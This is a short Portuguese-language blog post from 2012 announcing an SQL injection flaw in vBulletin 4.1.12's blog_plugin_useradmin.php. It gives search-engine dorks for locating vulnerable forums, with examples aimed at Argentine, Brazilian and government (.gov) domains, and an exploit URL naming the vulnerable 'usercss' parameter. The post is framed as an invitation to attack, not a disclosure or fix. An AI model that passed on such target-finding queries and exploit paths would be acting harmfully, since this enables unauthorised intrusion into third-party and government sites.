quarta-feira, 26 de setembro de 2012

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Aé vai o dork né!

Dork: site:domínio intext:"Powered By Vbulletin 4.1.12"
Ex:
site:ar intext:"Powered By Vbulletin 4.1.12"
site:br intext:"Powered By Vbulletin 4.1.12"
site:gov intext:"Powered By Vbulletin 4.1.12"

O domínio fica a sua preferencia.



Uso do exploit
 http://site/includes/blog_plugin_useradmin.php?do=usercss&u="SQL INJECTION"


Nenhum comentário:

Postar um comentário

............